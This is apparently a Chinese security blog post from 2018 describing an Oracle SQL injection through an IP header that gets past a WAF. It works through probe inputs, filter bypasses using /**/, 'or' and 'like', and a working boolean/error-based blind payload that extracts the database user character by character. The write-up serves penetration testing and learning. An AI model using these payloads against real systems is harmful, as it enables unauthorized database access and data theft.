记录一次Oracle注入绕waf

    这个注入挺特殊的,是ip头注入。我们进行简单的探测:

首先正常发起一次请求,我们发现content-type是76

    

 

 探测注入我习惯性的一个单引号:

一个单引号我发现长度还是76

  

 

我开始尝试单引号,双引号一起:

我失败了长度还是76

  

 

一般sql注入输入单引号一般长度都会有些变化。

  我记录深入探测,我输入'--%20

  

 

 

返回了200,并且长度是0,这让我产生了一丝好奇。这里很有可能存在注入哦。

  我继续探测:

  输入--%20

  

 

嘶!我不禁开始怀疑这里是不是本身就不存在安全问题呢?

  我都感觉像是数字类型了,很显然不是。。因为假设是数字类型注入输入'--%20会报错。

  那么究竟是什么问题呢?我觉得应该是过滤了注释符。过滤了--%20

  我开始换一种方式进行探测:

      我尝试输入'%20and%20'1'='1

  

 

返回200,长度为空,并且没有报false的提示,我觉得有戏,我尝试输入'%20and%20'1'='2

 

  

 

输出都一样。。。太坑了吧,这里我猜测可能过滤了and,也有可能过滤了空格

我们先把空格用+代替显示:

输入:'+and+'1'='1

  

 

返回长度还是76,继续输入:

'+and+'1'='2

 

没任何变化。好了+号测试了不行,我们试试还有啥方法可以代替空格?

输入'/**/and/**/'1'/**/=/**/'1:

 

返回长度76,继续输入:

'/**/and/**/'1'/**/=/**/'2

 

返回长度还是76。。没任何变化。

现在测试了三种方法,那么这里继续推测1.可能过滤了and 2.可能过滤了=号

基于这两种过滤,我开始尝试把and 替换成or,把=替换成/**/

  再进行输入新的payload:

'/**/or/**/'1'/**/like/**/'1

 

oh!我感觉我有希望了,他终于返回了不一样的结果,接下来继续探测:

输入:'/**/or/**/'1'/**/like/**/'2

 

返回长度76,至此我可以很确认这是个sql注入。

现在我们在理清下思路:

  1.使用like代替=

  2.使用/**/代替空格

  3.使用or代替and

  然后我们构造如下payload进行探测数据库user:

    '/***/OR/****/1/****/like/****/case/****/when/****/substr(user,1,1)/**/Like/***/'a'/**/then/**/1/****/else/****/exp(1111)/**/end/***/and/**/ '1'='1

    成功遍历出数据库第一位是J:

    

 

然后我们依次往下遍历就是了就能得到完整的user内容。

简单的演示下整个注入的过程。

这次遇到的注入让我知道了,坚持就是胜利!

 

posted @ 2018-12-21 19:14  飘渺红尘✨  阅读(2716)  评论(0编辑  收藏  举报